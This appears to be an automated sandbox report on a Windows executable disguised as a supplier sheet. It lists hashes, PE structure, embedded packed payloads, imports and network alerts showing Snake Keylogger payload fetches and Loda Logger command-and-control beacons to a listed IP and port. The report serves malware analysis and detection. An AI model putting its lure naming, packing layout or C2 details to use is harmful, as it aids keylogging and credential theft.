                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1835008
                                                                                                                Entropy (8bit):4.416728335008648
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:Qcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNQ5+:1i58oSWIZBk2MM6AFBWo
                                                                                                                MD5:40A09A580E377B9F0DF1DF0C3C1BD582
                                                                                                                SHA1:B5497C4544608E15A1F2E4C3A0135FF2D91CFE06
                                                                                                                SHA-256:3025D5CA6B1AB4755D0805592C0A6BAFA6D7E0C53E034E049B4A01B3A4495F0C
                                                                                                                SHA-512:8CA2A118B46BBEA62087522A6B753CCC9180D05FD1DB0CE792E029C9B4154A170C68485570B37140F5E71E4DF04E12BE2217B188DF0BAEBE214037F888D227BD
                                                                                                                Malicious:false
                                                                                                                Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.7...Z................................................................................................................................................................................................................................................................................................................................................'........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Entropy (8bit):7.450501854996061
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 93.09%
                                                                                                                • Win32 Executable Borland Delphi 7 (665061/41) 6.19%
                                                                                                                • UPX compressed Win32 Executable (30571/9) 0.28%
                                                                                                                • Win32 EXE Yoda's Crypter (26571/9) 0.25%
                                                                                                                • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                                File name:Supplier 0202AW-PER2 Sheet.exe
                                                                                                                File size:1'685'504 bytes
                                                                                                                MD5:97e5ba8188b0e2613fd02ee2b8dfee7a
                                                                                                                SHA1:17e314b66392d3d14e68f3e4a0ce4e3649255835
                                                                                                                SHA256:2d976b78efe5c7e983ff4cef98deb25d21a901e8f954f6d915d5642e75420296
                                                                                                                SHA512:dbb0c03170d807be5e43deb0fd7f1198bb56606cd4bb65d3ccb00b19759336f84c49072baedc6e674db308f58618f58e7d6de24fcb12c7f951de04e7e9c76e1f
                                                                                                                SSDEEP:24576:MnsJ39LyjbJkQFMhmC+6GD9nhloDX0XOf4Z79H8qN3k87zwVb2UDEusw:MnsHyjtk2MYC5GD5hloJf68qIyUDEuL
                                                                                                                TLSH:1C75CF22B2914477D133DA3C9C7BD2FC542ABE712E246B4AFBE42E4D4E3D3812955293
                                                                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                Icon Hash:094699b9b1b98005
                                                                                                                Entrypoint:0x49ab80
                                                                                                                Entrypoint Section:CODE
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                DLL Characteristics:
                                                                                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:4
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:4
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:4
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:332f7ce65ead0adfb3d35147033aabe9
                                                                                                                Instruction
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                add esp, FFFFFFF0h
                                                                                                                mov eax, 0049A778h
                                                                                                                call 00007F7768B5BCBDh
                                                                                                                mov eax, dword ptr [0049DBCCh]
                                                                                                                mov eax, dword ptr [eax]
                                                                                                                call 00007F7768BAF605h
                                                                                                                mov eax, dword ptr [0049DBCCh]
                                                                                                                mov eax, dword ptr [eax]
                                                                                                                mov edx, 0049ABE0h
                                                                                                                call 00007F7768BAF204h
                                                                                                                mov ecx, dword ptr [0049DBDCh]
                                                                                                                mov eax, dword ptr [0049DBCCh]
                                                                                                                mov eax, dword ptr [eax]
                                                                                                                mov edx, dword ptr [00496590h]
                                                                                                                call 00007F7768BAF5F4h
                                                                                                                mov eax, dword ptr [0049DBCCh]
                                                                                                                mov eax, dword ptr [eax]
                                                                                                                call 00007F7768BAF668h
                                                                                                                call 00007F7768B5979Bh
                                                                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa0000 | 0x2a42 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0xf0f30 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa5000 | 0xa980 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0xa4018 | 0x21 | .rdata
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xa4000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x99bec | 0x99c00 | 33fbe30e8a64654287edd1bf05ae7c8c | False | 0.5141641260162602 | data | 6.572957870355296 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0x9b000 | 0x2e54 | 0x3000 | 1f5e19e7d20c1d128443d738ac7bc610 | False | 0.453125 | data | 4.854620797809023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0x9e000 | 0x11e5 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xa0000 | 0x2a42 | 0x2c00 | 21ff53180b390dc06e3a1adf0e57a073 | False | 0.3537819602272727 | data | 4.919333216027082 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xa3000 | 0x10 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xa4000 | 0x39 | 0x200 | a92cf494c617731a527994013429ad97 | False | 0.119140625 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J" | 0.7846201577093705 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0xa5000 | 0xa980 | 0xaa00 | dcd1b1c3f3d28d444920211170d1e8e6 | False | 0.5899816176470588 | data | 6.674124985579511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0xb0000 | 0xf0f30 | 0xf1000 | b6dd0d300e3dd3f360697bcf9dba5cf5 | False | 0.8903048820020747 | data | 7.755808393959913 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0xb0dc8 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | | | 0.38636363636363635
RT_CURSOR | 0xb0efc | 0x134 | data | | | 0.4642857142857143
RT_CURSOR | 0xb1030 | 0x134 | data | | | 0.4805194805194805
RT_CURSOR | 0xb1164 | 0x134 | data | | | 0.38311688311688313
RT_CURSOR | 0xb1298 | 0x134 | data | | | 0.36038961038961037
RT_CURSOR | 0xb13cc | 0x134 | data | | | 0.4090909090909091
RT_CURSOR | 0xb1500 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | | | 0.4967532467532468
RT_BITMAP | 0xb1634 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066
RT_BITMAP | 0xb1804 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | | | 0.46487603305785125
RT_BITMAP | 0xb19e8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066
RT_BITMAP | 0xb1bb8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39870689655172414
RT_BITMAP | 0xb1d88 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.4245689655172414
RT_BITMAP | 0xb1f58 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5021551724137931
RT_BITMAP | 0xb2128 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5064655172413793
RT_BITMAP | 0xb22f8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105
RT_BITMAP | 0xb24c8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5344827586206896
RT_BITMAP | 0xb2698 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105
RT_BITMAP | 0xb2868 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.4870689655172414
RT_ICON | 0xb2950 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.08419324577861163
RT_ICON | 0xb39f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 8192 | Turkish | Turkey | 0.2101313320825516
RT_DIALOG | 0xb4aa0 | 0x52 | data | | | 0.7682926829268293
RT_STRING | 0xb4af4 | 0x358 | data | | | 0.3796728971962617
RT_STRING | 0xb4e4c | 0x428 | data | | | 0.37406015037593987
RT_STRING | 0xb5274 | 0x3a4 | data | | | 0.40879828326180256
RT_STRING | 0xb5618 | 0x3bc | data | | | 0.33472803347280333
RT_STRING | 0xb59d4 | 0x2d4 | data | | | 0.4654696132596685
RT_STRING | 0xb5ca8 | 0x334 | data | | | 0.42804878048780487
RT_STRING | 0xb5fdc | 0x42c | data | | | 0.42602996254681647
RT_STRING | 0xb6408 | 0x1f0 | data | | | 0.4213709677419355
RT_STRING | 0xb65f8 | 0x1c0 | data | | | 0.44419642857142855
RT_STRING | 0xb67b8 | 0xdc | data | | | 0.6
RT_STRING | 0xb6894 | 0x320 | data | | | 0.45125
RT_STRING | 0xb6bb4 | 0xd8 | data | | | 0.5879629629629629
RT_STRING | 0xb6c8c | 0x118 | data | | | 0.5678571428571428
RT_STRING | 0xb6da4 | 0x268 | data | | | 0.4707792207792208
RT_STRING | 0xb700c | 0x3f8 | data | | | 0.37598425196850394
RT_STRING | 0xb7404 | 0x378 | data | | | 0.41103603603603606
RT_STRING | 0xb777c | 0x380 | data | | | 0.35379464285714285
RT_STRING | 0xb7afc | 0x374 | data | | | 0.4061085972850679
RT_STRING | 0xb7e70 | 0xe0 | data | | | 0.5535714285714286
RT_STRING | 0xb7f50 | 0xbc | data | | | 0.526595744680851
RT_STRING | 0xb800c | 0x368 | data | | | 0.40940366972477066
RT_STRING | 0xb8374 | 0x3fc | data | | | 0.34901960784313724
RT_STRING | 0xb8770 | 0x2fc | data | | | 0.36649214659685864
RT_STRING | 0xb8a6c | 0x354 | data | | | 0.31572769953051644
RT_RCDATA | 0xb8dc0 | 0x44 | data | | | 0.8676470588235294
RT_RCDATA | 0xb8e04 | 0x10 | data | | | 1.5
RT_RCDATA | 0xb8e14 | 0xdf200 | PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed | | | 0.9224067752100841
RT_RCDATA | 0x198014 | 0x3 | ASCII text, with no line terminators | Turkish | Turkey | 3.6666666666666665
RT_RCDATA | 0x198018 | 0x3c00 | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | Turkish | Turkey | 0.54296875
RT_RCDATA | 0x19bc18 | 0x64c | data | | | 0.5998759305210918
RT_RCDATA | 0x19c264 | 0x153 | Delphi compiled form 'TFormVir' | | | 0.7522123893805309
RT_RCDATA | 0x19c3b8 | 0x47d3 | Microsoft Excel 2007+ | Turkish | Turkey | 0.8675150921846957
RT_GROUP_CURSOR | 0x1a0b8c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
RT_GROUP_CURSOR | 0x1a0ba0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
RT_GROUP_CURSOR | 0x1a0bb4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x1a0bc8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x1a0bdc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x1a0bf0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x1a0c04 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_ICON | 0x1a0c18 | 0x14 | data | Turkish | Turkey | 1.1
RT_VERSION | 0x1a0c2c | 0x304 | data | Turkish | Turkey | 0.42875647668393785
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll | RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
kernel32.dll | lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
ole32.dll | CLSIDFromString
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
ole32.dll | CLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
oleaut32.dll | GetErrorInfo, SysFreeString
comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
shell32.dll | ShellExecuteExA, ExtractIconExW
wininet.dll | InternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
shell32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
advapi32.dll | OpenSCManagerA, CloseServiceHandle
wsock32.dll | WSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
netapi32.dll | Netbios
Language of compilation system | Country where language is spoken | Map
Turkish | Turkey |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-30T10:57:56.192769+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.7 | 49728 | 172.111.138.100 | 5552 | TCP
2024-12-30T10:58:09.817408+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.7 | 49705 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:09.913069+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.7 | 49704 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:10.203162+0100 | 2832617 | ETPRO MALWARE W32.Bloat-A Checkin | 1 | 192.168.2.7 | 49708 | 69.42.215.252 | 80 | TCP
2024-12-30T10:58:10.879731+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.7 | 49712 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:10.918675+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.7 | 49709 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:12.421827+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.7 | 49715 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:12.441368+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.7 | 49716 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:12.936943+0100 | 2822116 | ETPRO MALWARE Loda Logger CnC Beacon | 1 | 192.168.2.7 | 49728 | 172.111.138.100 | 5552 | TCP
2024-12-30T10:58:12.936943+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.7 | 49728 | 172.111.138.100 | 5552 | TCP
2024-12-30T10:58:13.517215+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.7 | 49723 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:13.527812+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.7 | 49721 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:14.517817+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.7 | 49736 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:14.522804+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.7 | 49737 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:15.443750+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.7 | 49748 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:15.443767+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.7 | 49749 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:16.611701+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.7 | 49764 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:16.613834+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.7 | 49763 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:17.594819+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.7 | 49772 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:17.602167+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.7 | 49771 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:18.591556+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.7 | 49785 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:18.599250+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.7 | 49786 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:19.645197+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.7 | 49799 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:19.653539+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.7 | 49800 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:20.615514+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.7 | 49808 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:26.813226+0100 | 2830912 | ETPRO MALWARE Loda Logger CnC Beacon Response M2 | 1 | 172.111.138.100 | 5552 | 192.168.2.7 | 49728 | TCP
2024-12-30T10:58:59.134244+0100 | 2830912 | ETPRO MALWARE Loda Logger CnC Beacon Response M2 | 1 | 172.111.138.100 | 5552 | 192.168.2.7 | 49728 | TCP
2024-12-30T10:59:35.571823+0100 | 2830912 | ETPRO MALWARE Loda Logger CnC Beacon Response M2 | 1 | 172.111.138.100 | 5552 | 192.168.2.7 | 49728 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                Dec 30, 2024 10:58:11.447590113 CET44349716216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:11.447635889 CET49711443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:11.447655916 CET44349711142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:11.448801041 CET49717443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:11.448824883 CET44349717142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:11.448894024 CET49717443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:11.449131966 CET49717443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:11.449145079 CET44349717142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:12.045825005 CET44349715216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:12.045895100 CET49715443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:12.047328949 CET49715443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:12.047338963 CET44349715216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:12.049936056 CET49715443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:12.049945116 CET44349715216.58.206.46192.168.2.7
